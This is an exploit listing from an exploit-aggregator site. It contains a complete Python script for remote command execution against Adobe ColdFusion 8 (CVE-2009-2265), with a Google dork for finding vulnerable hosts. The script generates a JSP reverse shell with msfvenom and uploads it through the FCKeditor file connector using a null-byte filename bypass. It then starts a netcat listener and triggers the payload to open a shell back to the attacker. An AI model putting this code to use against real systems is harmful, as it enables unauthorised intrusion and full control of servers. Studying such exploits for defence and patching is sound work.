Exploit for Adobe ColdFusion 8 Remote Command Execution CVE-2009-2265

Name: Exploit for Adobe ColdFusion 8 Remote Command Execution CVE-2009-2265
Rating: 5 (292 reviews)
2021-06-24 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:163271
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)  
# Google Dork: intext:"adobe coldfusion 8"  
# Date: 24/06/2021  
# Exploit Author: Pergyz  
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html  
# Version: 8  
# Tested on: Microsoft Windows Server 2008 R2 Standard  
# CVE : CVE-2009-2265  
  
#!/usr/bin/python3  
  
from multiprocessing import Process  
import io  
import mimetypes  
import os  
import urllib.request  
import uuid  
  
class MultiPartForm:  
  
def __init__(self):  
self.files = []  
self.boundary = uuid.uuid4().hex.encode('utf-8')  
return  
  
def get_content_type(self):  
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))  
  
def add_file(self, fieldname, filename, fileHandle, mimetype=None):  
body = fileHandle.read()  
  
if mimetype is None:  
mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')  
  
self.files.append((fieldname, filename, mimetype, body))  
return  
  
@staticmethod  
def _attached_file(name, filename):  
return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')  
  
@staticmethod  
def _content_type(ct):  
return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')  
  
def __bytes__(self):  
buffer = io.BytesIO()  
boundary = b'--' + self.boundary + b'\r\n'  
  
for f_name, filename, f_content_type, body in self.files:  
buffer.write(boundary)  
buffer.write(self._attached_file(f_name, filename))  
buffer.write(self._content_type(f_content_type))  
buffer.write(b'\r\n')  
buffer.write(body)  
buffer.write(b'\r\n')  
  
buffer.write(b'--' + self.boundary + b'--\r\n')  
return buffer.getvalue()  
  
def execute_payload():  
print('\nExecuting the payload...')  
print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))  
  
def listen_connection():  
print('\nListening for connection...')  
os.system(f'nc -nlvp {lport}')  
  
if __name__ == '__main__':  
# Define some information  
lhost = '10.10.16.4'  
lport = 4444  
rhost = "10.10.10.11"  
rport = 8500  
filename = uuid.uuid4().hex  
  
# Generate a payload that connects back and spawns a command shell  
print("\nGenerating a payload...")  
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')  
  
# Encode the form data  
form = MultiPartForm()  
form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))  
data = bytes(form)  
  
# Create a request  
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)  
request.add_header('Content-type', form.get_content_type())  
request.add_header('Content-length', len(data))  
  
# Print the request  
print('\nPriting request...')  
  
for name, value in request.header_items():  
print(f'{name}: {value}')  
  
print('\n' + request.data.decode('utf-8'))  
  
# Send the request and print the response  
print('\nSending request and printing response...')  
print(urllib.request.urlopen(request).read().decode('utf-8'))  
  
# Print some information  
print('\nPrinting some information for debugging...')  
print(f'lhost: {lhost}')  
print(f'lport: {lport}')  
print(f'rhost: {rhost}')  
print(f'rport: {rport}')  
print(f'payload: {filename}.jsp')  
  
# Delete the payload  
print("\nDeleting the payload...")  
os.system(f'rm {filename}.jsp')  
  
# Listen for connections and execute the payload  
p1 = Process(target=listen_connection)  
p1.start()  
p2 = Process(target=execute_payload)  
p2.start()  
p1.join()  
p2.join()